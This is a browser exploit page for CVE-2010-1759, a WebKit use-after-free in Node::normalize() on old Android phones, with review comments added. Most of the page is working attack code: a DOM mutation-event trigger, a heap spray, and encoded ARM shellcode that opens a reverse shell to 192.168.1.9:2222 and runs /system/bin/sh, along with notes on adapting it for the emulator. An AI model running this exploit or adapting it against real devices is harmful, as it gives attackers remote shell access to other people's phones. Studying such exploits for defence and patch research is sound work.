<!--
  CVE-2010-1759 - WebKit Node::normalize() use-after-free.
  Proof of concept: heap spray + ARM reverse-shell shellcode.

  Tested on a Motorola Droid X2 running Android 2.2.
  The Droid X2 on 2.3 is vulnerable, but this exploit fails there because the
  heap is non-executable; no way around that yet.
  Also works on the 2.1 - 2.3 emulator; the changes needed are marked
  "FOR EMULATOR" in the code. The emulator is less consistent than a real phone.

  NOTE(review): the shellcode connects back to a hard-coded address
  (192.168.1.9:2222 - see the sockaddr bytes appended to `shell` below).
  Change that before use and only run this against a device you own, on an
  isolated network. Nothing in the page checks the target's version or
  architecture, so on any other browser it will at best do nothing and at
  worst crash the renderer. Loading this page also writes ~140 multi-KiB
  strings into the document, so it is slow and memory-hungry by design.

  Author: MJ Keith mjkeith[at]evilhippie.org
-->
<p>LOADING... </p>
<div id="test1"></div>
<div id="test2"></div>
<div id="test3"></div>
<script>
// Three elements, each given an attribute node that normalize() will merge.
// Each one is a separate attempt at the same trigger, presumably so that if
// the heap layout is wrong for one, a later attempt may still land.
var elem1 = document.getElementById("test1");
var elem2 = document.getElementById("test2");
var elem3 = document.getElementById("test3");

// Heap spray. Runs from inside a DOMSubtreeModified handler, i.e. while
// normalize() is still iterating the attribute whose children the handler
// just freed, and tries to get the spray data allocated over the freed node.
function spray() {
  // Churn the allocator with 180000 short, immediately-dead String objects
  // before the real spray. Presumably this shapes the free lists so the freed
  // node is reused by one of the strings written below -- TODO confirm.
  for (var i = 0; i < 180000; i++) {var s = new String(unescape("\u0052\u0052")); } // "\u0056\u0056" FOR EMULATOR
  // Address-fill pattern: every 4 bytes read as 0x52005200 little-endian.
  // Presumably the value the dangling pointer is expected to pick up, pointing
  // into the region filled by scode2 below; a different address on the emulator.
  var scode = unescape("\u5200\u5200");// "\u0058\u0058" FOR EMULATOR
  // NOP sled: 0xe1a05005 is ARM `mov r5, r5`; repeated to fill the block.
  var scode2 = unescape("\u5005\ue1a0");
  // Shellcode, little-endian, packed two bytes per UTF-16 code unit.
  // Reading the encoded words, this appears to be: socket(AF_INET, SOCK_STREAM,
  // 6) with r7 = 0x8c+0x8d = 0x119, connect() with r7 = 0x11b and r1 set
  // pc-relative to the sockaddr (r2 = 16 via `mov r2, #0x10`), dup2() of the
  // socket onto fds 0/1/2 with r7 = 0x3f, then `add r2, pc, #1; bx r2` into a
  // Thumb stub that tries setuid(0) (r7 = 0x17) and execve()s the
  // "//system/bin/sh" string embedded after it. The \u2000 run is padding and
  // the final \u0002 is presumably the start of the sockaddr_in
  // (sin_family = AF_INET); port and address are appended just below.
  var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
  shell += unescape("\uae08"); // sin_port: bytes 08 AE = 2222 in network byte order
  shell += unescape("\ua8c0\u0901"); // sin_addr: bytes C0 A8 01 09 = 192.168.1.9  // "\u000a\u0202" FOR EMULATOR (10.0.2.2, the emulator's host alias)
  shell += unescape("\u2000\u2000"); // presumably sin_zero padding; the port was already set two lines up
  // Double both buffers until they exceed 0x1000 code units (they end at 8192
  // units = 16 KiB each), then tack the shellcode onto the end of the NOP sled.
  do { scode += scode; scode2 += scode2; } while (scode.length<=0x1000);
  scode2 += shell  // NOTE(review): no semicolon -- relies on ASI
  // Write ~140 blocks into the document: the first 100 carry the address
  // pattern, the rest the sled + shellcode.
  // NOTE(review): `target` and `i` are implicit globals. Index 100 matches
  // neither branch, so target[100] is undefined and document.write() emits
  // the literal text "undefined" -- probably an off-by-one. Left as-is because
  // changing the write sequence changes the heap layout this was tuned against.
  target = new Array();
  for(i = 0; i < 141; i++){// CHANGE 141 TO 201 FOR EMULATOR
    if (i<100){ target[i] = scode;}
    if (i>100){ target[i] = scode2;}
    document.write(target[i]);
    document.write("<br />");
    // NOTE(review): never true -- the loop bound is 141, so i tops out at 140
    // (200 with the emulator values); this extra <br /> is dead code.
    if (i>140){ // CHANGE 140 TO 200 FOR EMULATOR
      document.write("<br />");}
  }
}

// DOMSubtreeModified listeners, attached to the attribute node itself. Each
// fires while that element's normalize() is merging the attribute's child
// text nodes; removing the attribute frees them under the iterator, and
// spray() then tries to reclaim the freed memory with controlled data.
function handler1() { elem1.removeAttribute("b"); spray(); } // NOTE(review): never registered -- elem1 is wired to handler2 below
function handler2() { elem2.removeAttribute("b"); spray(); }
function handler3() { elem3.removeAttribute("b"); spray(); }

// Burns time with console.log(), then calls normalize() on all three elements
// during the last nine iterations. When this runs from the top level below,
// only elem1 has its attribute set up, so elem2/elem3.normalize() have nothing
// to merge yet; the name suggests it is a timing delay before the first
// trigger. On the emulator it is replaced by a plain elem1.normalize().
function slowdown() {
  for (var i = 0; i < 120; i++) {
    console.log('slow' + i);
    if (i > 110 ){ elem1.normalize(); elem2.normalize(); elem3.normalize(); }
  }
}

// ---- Trigger sequence -------------------------------------------------------
// For each element: create attribute b="a", append a second text node to the
// attribute (so normalize() has two adjacent Text children to merge), listen
// for the mutation event on the attribute node, force layout, then normalize.
elem1.setAttribute("b", "a");
elem1.attributes[0].appendChild(document.createTextNode("hi"));
// NOTE(review): this registers handler2, which removes elem2's attribute --
// elem2 has no "b" attribute at this point, so for elem1 this presumably only
// runs the spray and not the actual free-under-iteration. handler1 is never
// used. Whether that is intentional is unclear; since the exploit was tested
// with this wiring it is left untouched.
elem1.attributes[0].addEventListener("DOMSubtreeModified", handler2,false);
document.body.offsetTop; // value discarded; read for its side effect of forcing a synchronous layout
slowdown();// COMMENT OUT THIS FUNCTION CALL FOR EMULATOR
//elem1.normalize(); // UN-COMMENT THIS LINE FOR EMULATOR
document.body.offsetTop;

// Second attempt: same setup on elem2, handler removes elem2's own attribute.
elem2.setAttribute("b", "a");
elem2.attributes[0].appendChild(document.createTextNode("hi"));
elem2.attributes[0].addEventListener("DOMSubtreeModified", handler2,false);
document.body.offsetTop;
elem2.normalize();

// Third attempt: same setup on elem3, handler removes elem3's own attribute.
elem3.setAttribute("b", "a");
elem3.attributes[0].appendChild(document.createTextNode("hi"));
elem3.attributes[0].addEventListener("DOMSubtreeModified", handler3,false);
document.body.offsetTop;
elem3.normalize();
</script>